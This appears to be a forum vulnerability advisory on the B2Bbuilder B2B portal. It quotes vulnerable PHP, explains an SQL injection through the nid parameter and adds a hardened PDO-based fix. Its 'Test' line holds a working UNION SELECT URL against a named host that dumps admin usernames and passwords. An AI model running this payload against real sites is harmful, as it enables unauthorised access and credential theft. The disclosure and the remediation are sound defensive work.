Product Introduction:
B2Bbuilder provides you with an efficient, stable, and powerful B2B e-commerce industry portal solution.
Defects:
wap/index.php
if (!empty($_GET["action"]))
    $action = $_GET["action"];
else
    $action = "home";
//$action = empty($action) ? "home" : $_GET["action"];
//======================================
// $action is checked against a fixed list before it is used in the include path
if (in_array($action, array('home', 'offer_cat', 'offer_list', 'offer_detail', 'product_cat', 'product_list', 'product_detail', 'news_cat', 'news_list', 'news_detail', 'distribute ate _ cat ', 'initialize ate _ list', 'initialize ate _ detail', 'search', 'initialize ate _ moredetail ', 'product_showimg')))
{
    require 'inc/' . $action . '.php';
}
news_cat.php file:
if (!empty($_GET['nid']))
{
    $nid = $_GET['nid'];
    // $nid goes into the query unquoted and unvalidated: this is the injection point
    $sql = "select * from " . NEWSCAT . " where pid=$nid";
    $db->query($sql);
    $sre = $db->getRows();
    if (count($sre) > 0)
    {
        foreach ($sre as $v)
        {
            echo "[information] <a href='?action=news_list&newsid=" . $v['catid'] . "'>" . $v['cat'] . "</a>";
        }
        echo "<a href='?action=news_cat'><i>return</i></a>";
        //echo "<anchor>back<prev/></anchor>";
    }
    else
    {
        // the unvalidated value is also reflected into the redirect target
        header("Location: ./?action=news_list&nid=" . $nid);
        exit();
    }
}
Any malformed statement produces an error that discloses the database table prefix.
Test:
http://www.bkjia.com/B2B/wap/index.php?action=news_cat&nid=17%20and%201=2%20uNion%20select%201,concat(0x7E217E21,user,0x3A,password,0x7E217E21),3,4,5,6,7,8%20FROM%20[database prefix]_admin
Local file inclusion, limited by magic_quotes_gpc:
module/news/admin/newscat.php
Fix:
See the above analysis
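One way to apply the fix to the nid handling in news_cat.php, as an added example that is not B2Bbuilder's code or the author's. It assumes PDO in place of the application's $db wrapper; the table demo_newscat, its rows and the function names are constructed for illustration.

```php
<?php
// Added example: hardened handling of the nid parameter (not B2Bbuilder's own code).
// Assumptions: PDO replaces the application's $db wrapper; the table
// "demo_newscat" and its rows are constructed sample data.

function fetchNewsCategories(PDO $pdo, $rawNid): ?array
{
    // Accept only a non-negative integer; anything else is rejected outright.
    $nid = filter_var($rawNid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    if ($nid === false) {
        return null;
    }
    // Bound parameter: the value never becomes part of the SQL text.
    $stmt = $pdo->prepare('SELECT catid, cat FROM demo_newscat WHERE pid = :pid');
    $stmt->bindValue(':pid', $nid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

function renderCategoryLinks(array $rows): string
{
    $html = '';
    foreach ($rows as $row) {
        // Encode database values before placing them in markup.
        $html .= sprintf(
            "<a href='?action=news_list&amp;newsid=%d'>%s</a>\n",
            (int) $row['catid'],
            htmlspecialchars($row['cat'], ENT_QUOTES, 'UTF-8')
        );
    }
    return $html;
}

// Constructed in-memory database so the example runs offline.
$pdo = new PDO('sqlite::memory:');
// Exceptions should be caught and logged server-side, never echoed to the client,
// so a failing query cannot reveal the table prefix.
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE demo_newscat (catid INTEGER, pid INTEGER, cat TEXT)');
$pdo->exec("INSERT INTO demo_newscat VALUES (1, 17, 'Trade <news>'), (2, 17, 'Industry')");

// Constructed inputs: a valid id, then a non-numeric value that must be rejected.
foreach (['17', '17 and 1=2'] as $input) {
    $rows = fetchNewsCategories($pdo, $input);
    echo $rows === null
        ? 'rejected: ' . var_export($input, true) . "\n"
        : renderCategoryLinks($rows);
}
```

The same validated integer should be used when building the Location header in the else branch, so the raw request value never reaches the response.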
Author: t00ls.net